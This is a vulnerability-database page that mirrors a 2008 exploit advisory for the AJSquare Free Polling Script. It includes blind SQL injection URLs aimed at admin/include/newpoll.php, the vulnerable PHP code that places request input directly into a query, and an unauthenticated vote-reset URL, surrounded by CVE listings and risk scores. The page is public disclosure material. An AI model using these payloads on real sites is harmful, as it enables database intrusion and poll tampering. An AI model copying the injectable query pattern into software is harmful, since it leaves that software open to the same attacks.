Lucene search
+L

AJSquare Free Polling Script - 'DB' Multiple Vulnerabilities

🗓️ 10 Nov 2008 00:00:00Reported by G4N0KType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

AJSquare Free Polling Script 'DB' Multiple Vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-7044
10 Nov 200800:00
circl
circl
Circl
CVE-2008-7045
10 Nov 200800:00
circl
circl
Circl
CVE-2008-7046
10 Nov 200800:00
circl
cve
CVE
CVE-2008-7044
24 Aug 200910:00
cve
cve
CVE
CVE-2008-7045
24 Aug 200910:00
cve
cve
CVE
CVE-2008-7046
24 Aug 200910:00
cve
cvelist
Cvelist
CVE-2008-7044
24 Aug 200910:00
cvelist
cvelist
Cvelist
CVE-2008-7045
24 Aug 200910:00
cvelist
cvelist
Cvelist
CVE-2008-7046
24 Aug 200910:00
cvelist
euvd
EUVD
EUVD-2008-7003
7 Oct 202500:30
euvd
Rows per page
==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|


==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' /
                    | |_| | |__   _| | |\  | | |_| | | . \
                     \____|    |_|   |_| \_|  \___/  |_|\_\

==============================================================================
	AJSquare Free Polling Script (DB) Multiple Vulnerabilities
==============================================================================

	[»] Script:             [ AJSquare Free Polling Script DataBase Version ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://www.ajsquare.com/resources/dpoll.php?resource=free_script ]
	[»] Type:               [ Free ]
	[»] Report-Date:        [ 10.11.2008 ]
	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]


===[ XPL ]===

	[1][!] Blind SQLi (MQ = off)
		[»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=5/*		True
		[»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=4/*		False

		[../admin/include/newpoll.php]

			<?php
			require 'connect.php';
			$ques = $_GET[ques];
			$total = $_GET[total];
			for($i=1;$i<=$total;$i++)
				{
					$val[] = array($_GET["val".$i]);
				}

			$sqlnew = "select * from newpoll where question='$ques'";
			$resnew = mysql_query($sqlnew);

		[../admin/include/newpoll.php]




	[2][!] Reset Votes - Just call resetvote.php ;)
		[»] http://127.0.0.1/[path]/admin/resetvote.php




===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 <Tornado2800[at]gmail.com>
	[»] Hussain-X <darkangel_g85[at]yahoo.com>

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit();
===============================================================================

# milw0rm.com [2008-11-10]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Nov 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02602
48